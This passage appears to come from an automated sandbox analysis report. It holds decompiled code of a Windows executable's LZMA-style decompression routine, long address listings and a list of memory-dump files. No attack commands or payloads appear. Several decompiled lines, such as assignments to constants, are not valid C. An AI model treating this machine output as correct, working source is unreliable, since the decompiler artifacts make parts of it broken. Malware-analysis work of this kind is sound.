              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
              								__eax =  *(__ebp - 0x30);
              								_t400 = __ebp - 0x60;
              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
              								__eflags =  *_t400;
              								goto L123;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							 *(__ebp - 0x2c) = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								 *(__ebp - 0x48) = __ecx;
              								L102:
              								__eflags =  *(__ebp - 0x48);
              								if( *(__ebp - 0x48) <= 0) {
              									__eax = __eax + __ebx;
              									 *(__ebp - 0x40) = 4;
              									 *(__ebp - 0x2c) = __eax;
              									__eax =  *(__ebp - 4);
              									__eax =  *(__ebp - 4) + 0x644;
              									__eflags = __eax;
              									L108:
              									__ebx = 0;
              									 *(__ebp - 0x58) = __eax;
              									 *(__ebp - 0x50) = 1;
              									 *(__ebp - 0x44) = 0;
              									 *(__ebp - 0x48) = 0;
              									L112:
              									__eax =  *(__ebp - 0x40);
              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
              										_t391 = __ebp - 0x2c;
              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
              										__eflags =  *_t391;
              										goto L119;
              									}
              									__eax =  *(__ebp - 0x50);
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              									__eax =  *(__ebp - 0x58);
              									__esi = __edi + __eax;
              									 *(__ebp - 0x54) = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
              									__eflags =  *(__ebp - 0xc) - __edx;
              									if( *(__ebp - 0xc) >= __edx) {
              										__ecx = 0;
              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
              										__ecx = 1;
              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
              										__ebx = 1;
              										__ecx =  *(__ebp - 0x48);
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx =  *(__ebp - 0x44);
              										__ebx =  *(__ebp - 0x44) | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										 *(__ebp - 0x44) = __ebx;
              										 *__esi = __ax;
              										 *(__ebp - 0x50) = __edi;
              									} else {
              										 *(__ebp - 0x10) = __edx;
              										0x800 = 0x800 - __ecx;
              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              										 *__esi = __dx;
              									}
              									__eflags =  *(__ebp - 0x10) - 0x1000000;
              									if( *(__ebp - 0x10) >= 0x1000000) {
              										L111:
              										_t368 = __ebp - 0x48;
              										 *_t368 =  *(__ebp - 0x48) + 1;
              										__eflags =  *_t368;
              										goto L112;
              									} else {
              										goto L109;
              									}
              								}
              								__ecx =  *(__ebp - 0xc);
              								__ebx = __ebx + __ebx;
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              									__ecx =  *(__ebp - 0x10);
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									 *(__ebp - 0x44) = __ebx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									L101:
              									_t338 = __ebp - 0x48;
              									 *_t338 =  *(__ebp - 0x48) - 1;
              									__eflags =  *_t338;
              									goto L102;
              								} else {
              									goto L99;
              								}
              							}
              							__edx =  *(__ebp - 4);
              							__eax = __eax - __ebx;
              							 *(__ebp - 0x40) = __ecx;
              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              							goto L108;
              						case 0x1a:
              							L56:
              							__eflags =  *(__ebp - 0x64);
              							if( *(__ebp - 0x64) == 0) {
              								 *(__ebp - 0x88) = 0x1a;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x68);
              							__al =  *(__ebp - 0x5c);
              							__edx =  *(__ebp - 8);
              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              							 *( *(__ebp - 0x68)) = __al;
              							__ecx =  *(__ebp - 0x14);
              							 *(__ecx +  *(__ebp - 8)) = __al;
              							__eax = __ecx + 1;
              							__edx = 0;
              							_t192 = __eax %  *(__ebp - 0x74);
              							__eax = __eax /  *(__ebp - 0x74);
              							__edx = _t192;
              							goto L79;
              						case 0x1b:
              							goto L75;
              						case 0x1c:
              							while(1) {
              								L123:
              								__eflags =  *(__ebp - 0x64);
              								if( *(__ebp - 0x64) == 0) {
              									break;
              								}
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__edx =  *(__ebp - 8);
              								__cl =  *(__eax + __edx);
              								__eax =  *(__ebp - 0x14);
              								 *(__ebp - 0x5c) = __cl;
              								 *(__eax + __edx) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t414 = __eax %  *(__ebp - 0x74);
              								__eax = __eax /  *(__ebp - 0x74);
              								__edx = _t414;
              								__eax =  *(__ebp - 0x68);
              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              								__eflags =  *(__ebp - 0x30);
              								 *( *(__ebp - 0x68)) = __cl;
              								 *(__ebp - 0x14) = _t414;
              								if( *(__ebp - 0x30) > 0) {
              									continue;
              								} else {
              									goto L80;
              								}
              							}
              							 *(__ebp - 0x88) = 0x1c;
              							goto L170;
              					}
              				}
              			}













              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406AAC(void* __ecx) {
              				void* _v8;
              				void* _v12;
              				signed int _v16;
              				unsigned int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int _v48;
              				signed int _v52;
              				signed int _v56;
              				signed int _v60;
              				signed int _v64;
              				signed int _v68;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				signed int _v84;
              				signed int _v88;
              				signed int _v92;
              				signed int _v95;
              				signed int _v96;
              				signed int _v100;
              				signed int _v104;
              				signed int _v108;
              				signed int _v112;
              				signed int _v116;
              				signed int _v120;
              				intOrPtr _v124;
              				signed int _v128;
              				signed int _v132;
              				signed int _v136;
              				void _v140;
              				void* _v148;
              				signed int _t537;
              				signed int _t538;
              				signed int _t572;
              
              				_t572 = 0x22;
              				_v148 = __ecx;
              				memcpy( &_v140, __ecx, _t572 << 2);
              				if(_v52 == 0xffffffff) {
              					return 1;
              				}
              				while(1) {
              					L3:
              					_t537 = _v140;
              					if(_t537 > 0x1c) {
              						break;
              					}
              					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
              						case 0:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_v116 = _v116 + 1;
              							_t537 =  *_v116;
              							__eflags = _t537 - 0xe1;
              							if(_t537 > 0xe1) {
              								goto L174;
              							}
              							_t542 = _t537 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t576);
              							_push(9);
              							_pop(_t577);
              							_t622 = _t542 / _t576;
              							_t544 = _t542 % _t576 & 0x000000ff;
              							asm("cdq");
              							_t617 = _t544 % _t577 & 0x000000ff;
              							_v64 = _t617;
              							_v32 = (1 << _t622) - 1;
              							_v28 = (1 << _t544 / _t577) - 1;
              							_t625 = (0x300 << _t617 + _t622) + 0x736;
              							__eflags = 0x600 - _v124;
              							if(0x600 == _v124) {
              								L12:
              								__eflags = _t625;
              								if(_t625 == 0) {
              									L14:
              									_v76 = _v76 & 0x00000000;
              									_v68 = _v68 & 0x00000000;
              									goto L17;
              								} else {
              									goto L13;
              								}
              								do {
              									L13:
              									_t625 = _t625 - 1;
              									__eflags = _t625;
              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
              								} while (_t625 != 0);
              								goto L14;
              							}
              							__eflags = _v8;
              							if(_v8 != 0) {
              								GlobalFree(_v8);
              							}
              							_t537 = GlobalAlloc(0x40, 0x600); // executed
              							__eflags = _t537;
              							_v8 = _t537;
              							if(_t537 == 0) {
              								goto L174;
              							} else {
              								_v124 = 0x600;
              								goto L12;
              							}
              						case 1:
              							L15:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 1;
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
              							_v116 = _v116 + 1;
              							_t50 =  &_v76;
              							 *_t50 = _v76 + 1;
              							__eflags =  *_t50;
              							L17:
              							__eflags = _v76 - 4;
              							if(_v76 < 4) {
              								goto L15;
              							}
              							_t550 = _v68;
              							__eflags = _t550 - _v120;
              							if(_t550 == _v120) {
              								L22:
              								_v76 = 5;
              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
              								goto L25;
              							}
              							__eflags = _v12;
              							_v120 = _t550;
              							if(_v12 != 0) {
              								GlobalFree(_v12);
              							}
              							_t537 = GlobalAlloc(0x40, _v68); // executed
              							__eflags = _t537;
              							_v12 = _t537;
              							if(_t537 == 0) {
              								goto L174;
              							} else {
              								goto L22;
              							}
              						case 2:
              							L26:
              							_t557 = _v100 & _v32;
              							_v136 = 6;
              							_v80 = _t557;
              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
              							goto L135;
              						case 3:
              							L23:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 3;
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_t72 =  &_v116;
              							 *_t72 = _v116 + 1;
              							__eflags =  *_t72;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L25:
              							_v76 = _v76 - 1;
              							__eflags = _v76;
              							if(_v76 != 0) {
              								goto L23;
              							}
              							goto L26;
              						case 4:
              							L136:
              							_t559 =  *_t626;
              							_t610 = _t559 & 0x0000ffff;
              							_t591 = (_v20 >> 0xb) * _t610;
              							__eflags = _v16 - _t591;
              							if(_v16 >= _t591) {
              								_v20 = _v20 - _t591;
              								_v16 = _v16 - _t591;
              								_v68 = 1;
              								_t560 = _t559 - (_t559 >> 5);
              								__eflags = _t560;
              								 *_t626 = _t560;
              							} else {
              								_v20 = _t591;
              								_v68 = _v68 & 0x00000000;
              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
              							}
              							__eflags = _v20 - 0x1000000;
              							if(_v20 >= 0x1000000) {
              								goto L142;
              							} else {
              								goto L140;
              							}
              						case 5:
              							L140:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 5;
              								goto L173;
              							}
              							_v20 = _v20 << 8;
              							_v112 = _v112 - 1;
              							_t464 =  &_v116;
              							 *_t464 = _v116 + 1;
              							__eflags =  *_t464;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L142:
              							_t561 = _v136;
              							goto L143;
              						case 6:
              							__edx = 0;
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v56 = 1;
              								_v136 = 7;
              								__esi = _v8 + 0x180 + _v60 * 2;
              								goto L135;
              							}
              							__eax = _v96 & 0x000000ff;
              							__esi = _v100;
              							__cl = 8;
              							__cl = 8 - _v64;
              							__esi = _v100 & _v28;
              							__eax = (_v96 & 0x000000ff) >> 8;
              							__ecx = _v64;
              							__esi = (_v100 & _v28) << 8;
              							__ecx = _v8;
              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
              							__eflags = _v60 - 4;
              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
              							if(_v60 >= 4) {
              								__eflags = _v60 - 0xa;
              								if(_v60 >= 0xa) {
              									_t103 =  &_v60;
              									 *_t103 = _v60 - 6;
              									__eflags =  *_t103;
              								} else {
              									_v60 = _v60 - 3;
              								}
              							} else {
              								_v60 = 0;
              							}
              							__eflags = _v56 - __edx;
              							if(_v56 == __edx) {
              								__ebx = 0;
              								__ebx = 1;
              								goto L63;
              							}
              							__eax = _v24;
              							__eax = _v24 - _v48;
              							__eflags = __eax - _v120;
              							if(__eax >= _v120) {
              								__eax = __eax + _v120;
              								__eflags = __eax;
              							}
              							__ecx = _v12;
              							__ebx = 0;
              							__ebx = 1;
              							__al =  *((intOrPtr*)(__eax + __ecx));
              							_v95 =  *((intOrPtr*)(__eax + __ecx));
              							goto L43;
              						case 7:
              							__eflags = _v68 - 1;
              							if(_v68 != 1) {
              								__eax = _v40;
              								_v132 = 0x16;
              								_v36 = _v40;
              								__eax = _v44;
              								_v40 = _v44;
              								__eax = _v48;
              								_v44 = _v48;
              								__eax = 0;
              								__eflags = _v60 - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								_v60 = (__eflags >= 0) - 1 + 0xa;
              								__eax = _v8;
              								__eax = _v8 + 0x664;
              								__eflags = __eax;
              								_v92 = __eax;
              								goto L71;
              							}
              							__eax = _v8;
              							__ecx = _v60;
              							_v136 = 8;
              							__esi = _v8 + 0x198 + _v60 * 2;
              							goto L135;
              						case 8:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v136 = 0xa;
              								__esi = _v8 + 0x1b0 + _v60 * 2;
              							} else {
              								__eax = _v60;
              								__ecx = _v8;
              								__eax = _v60 + 0xf;
              								_v136 = 9;
              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
              							}
              							goto L135;
              						case 9:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								goto L92;
              							}
              							__eflags = _v100;
              							if(_v100 == 0) {
              								goto L174;
              							}
              							__eax = 0;
              							__eflags = _v60 - 7;
              							_t264 = _v60 - 7 >= 0;
              							__eflags = _t264;
              							0 | _t264 = _t264 + _t264 + 9;
              							_v60 = _t264 + _t264 + 9;
              							goto L78;
              						case 0xa:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v136 = 0xb;
              								__esi = _v8 + 0x1c8 + _v60 * 2;
              								goto L135;
              							}
              							__eax = _v44;
              							goto L91;
              						case 0xb:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__ecx = _v40;
              								__eax = _v36;
              								_v36 = _v40;
              							} else {
              								__eax = _v40;
              							}
              							__ecx = _v44;
              							_v40 = _v44;
              							L91:
              							__ecx = _v48;
              							_v48 = __eax;
              							_v44 = _v48;
              							L92:
              							__eax = _v8;
              							_v132 = 0x15;
              							__eax = _v8 + 0xa68;
              							_v92 = _v8 + 0xa68;
              							goto L71;
              						case 0xc:
              							L102:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xc;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t340 =  &_v116;
              							 *_t340 = _v116 + 1;
              							__eflags =  *_t340;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							__eax = _v48;
              							goto L104;
              						case 0xd:
              							L39:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xd;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t127 =  &_v116;
              							 *_t127 = _v116 + 1;
              							__eflags =  *_t127;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L41:
              							__eax = _v68;
              							__eflags = _v76 - _v68;
              							if(_v76 != _v68) {
              								goto L50;
              							}
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								goto L56;
              							}
              							L43:
              							__eax = _v95 & 0x000000ff;
              							_v95 = _v95 << 1;
              							__ecx = _v92;
              							__eax = (_v95 & 0x000000ff) >> 7;
              							_v76 = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi = _v92 + __eax * 2;
              							_v20 = _v20 >> 0xb;
              							__ax =  *__esi;
              							_v88 = __esi;
              							__edx = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edx;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								_v68 = 1;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								_v68 = _v68 & 0x00000000;
              								_v20 = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							_v72 = __ebx;
              							if(_v20 >= 0x1000000) {
              								goto L41;
              							} else {
              								goto L39;
              							}
              						case 0xe:
              							L48:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xe;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t161 =  &_v116;
              							 *_t161 = _v116 + 1;
              							__eflags =  *_t161;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							while(1) {
              								L50:
              								__eflags = __ebx - 0x100;
              								if(__ebx >= 0x100) {
              									break;
              								}
              								__eax = _v92;
              								__edx = __ebx + __ebx;
              								__ecx = _v20;
              								__esi = __edx + __eax;
              								__ecx = _v20 >> 0xb;
              								__ax =  *__esi;
              								_v88 = __esi;
              								__edi = __ax & 0x0000ffff;
              								__ecx = (_v20 >> 0xb) * __edi;
              								__eflags = _v16 - __ecx;
              								if(_v16 >= __ecx) {
              									_v20 = _v20 - __ecx;
              									_v16 = _v16 - __ecx;
              									__cx = __ax;
              									_t175 = __edx + 1; // 0x1
              									__ebx = _t175;
              									__cx = __ax >> 5;
              									__eflags = __eax;
              									 *__esi = __ax;
              								} else {
              									_v20 = __ecx;
              									0x800 = 0x800 - __edi;
              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              									__ebx = __ebx + __ebx;
              									 *__esi = __cx;
              								}
              								__eflags = _v20 - 0x1000000;
              								_v72 = __ebx;
              								if(_v20 >= 0x1000000) {
              									continue;
              								} else {
              									goto L48;
              								}
              							}
              							L56:
              							_t178 =  &_v56;
              							 *_t178 = _v56 & 0x00000000;
              							__eflags =  *_t178;
              							goto L57;
              						case 0xf:
              							L60:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xf;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
